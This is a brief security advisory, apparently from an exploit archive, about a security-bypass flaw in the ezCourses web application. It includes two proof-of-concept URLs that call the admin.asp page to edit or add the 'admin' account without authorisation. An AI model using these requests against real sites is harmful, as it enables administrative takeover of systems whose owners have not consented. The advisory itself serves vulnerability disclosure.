8 lines
No EOL
459 B
Text
8 lines
No EOL
459 B
Text
source: http://www.securityfocus.com/bid/49907/info
|
|
|
|
ezCourses is prone to a security-bypass vulnerability because it fails to properly validate user-supplied input.
|
|
|
|
Attackers could exploit the issue to bypass certain security restrictions and add or change the 'admin' account password.
|
|
|
|
http://www.example.com//ezCourses/admin/admin.asp?cmd=edit_admin&AdminID=1&Master=Master
|
|
http://www.example.com/ezCourses/admin/admin.asp?cmd=add_admin&AdminID=1 |